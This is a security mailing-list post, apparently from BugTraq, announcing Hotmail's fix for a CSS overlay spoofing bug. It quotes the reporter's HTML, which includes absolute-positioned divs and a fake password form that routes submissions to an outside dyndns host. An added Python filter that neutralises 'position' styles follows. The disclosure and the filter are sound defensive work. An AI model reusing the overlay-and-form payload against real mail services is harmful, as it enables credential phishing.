Microsoft has finally patched today the css/div hole in Hotmail.
Absolute positioning in 'style' is now filtered with static.
Other web-based mailers, sites with bookmarks, forums, etc. should quickly
do the same.
Above, the original mail from Wouter Westerveld, who informed me.
Cheers,

Gregory Duchemin




Hello,

  Hotmail has fixed the "css hotmail spoofing/ password recovery" bug. I
  was just testing it, and at once, it didn't work anymore.

  Hotmail will replace "position: absolute" by "position: static".  Here
  below, there is a part of the source from what I sent to Hotmail, and
  of what Hotmail made from it.

  I don't know if I have to send this email to BugTraq, so please forward it
  for me if you think that is necessary.

  Greets,

  Wouter Westerveld
     (16 years old, the Netherlands)

  --------This is what I sent to Hotmail:----------------

  <div align="left">
    <div id="layer1" style="width:101%; height:950; position:absolute;
  left:0px; top:0px; z-index:0;">


          <div id="layer2" style="position:absolute; left:40; top:10;
  z-index:0;">


  -------This was in the source of the Hotmail HTML page--------------
    <div id="layer1" style="width:101%; height:950; position:static;
  left:0px; top:0px; z-index:0;
  ">


          <div id="layer2" style="position:static; left:40; top:10;
  z-index:0;
  ">

  <center>
  <form name="passwordform2" action="http://64.4.16.250/cgi-bin/postrd/EN"
  method="GET" target="_blank" AUTOCOMPLETE="OFF" >
  <input type=hidden name="hm___action"
  value="http%3a%2f%2flinuxbak%2edyndns%2eorg%2fcgi%2dbin%2fhotmail">

  <table cellpadding=0 cellspacing=0 border=0 width=590>
   <tr>
    <td colspan=2>


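The rewrite described in the mails above, as an added example (not from the original mails and not Hotmail's code): a small Python filter that forces the `position` property of inline styles to `static`. It goes beyond the absolute-to-static replacement shown above by rewriting every `position` value and by normalising case, CSS comments and CSS escapes before matching; all function and class names are hypothetical.

```python
import re
from html import escape
from html.parser import HTMLParser

COMMENT = re.compile(r"/\*.*?\*/", re.S)                      # CSS comments
ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)   # CSS escapes

def _unescape(m):
    if m.group(1) is None:
        return m.group(2)
    cp = int(m.group(1), 16)
    return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"

def neutralize_position(style):
    """Return the inline style with every 'position' value forced to static."""
    out = []
    # Simplification: declarations are split on ';' without parsing strings.
    for decl in COMMENT.sub("", style).split(";"):
        name, sep, value = decl.partition(":")
        prop = ESCAPE.sub(_unescape, name).strip().lower()
        if not sep or not prop:
            continue
        out.append(f"{prop}:{'static' if prop == 'position' else value.strip()}")
    return "; ".join(out)

class StyleFilter(HTMLParser):
    """Re-emit HTML with rewritten style attributes; comments are dropped."""
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        parts = [tag]
        for key, val in attrs:
            if key == "style" and val is not None:
                val = neutralize_position(val)
            parts.append(key if val is None else f'{key}="{escape(val)}"')
        self.out.append("<" + " ".join(parts) + ">")
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        # Character references were decoded by the parser; re-encode text.
        self.out.append(escape(data, quote=False))

def filter_html(html):
    f = StyleFilter()
    f.feed(html)
    f.close()
    return "".join(f.out)
```

Matching on the parsed property name rather than on the literal string `position:absolute` is what keeps differently spelled declarations from slipping past the rewrite.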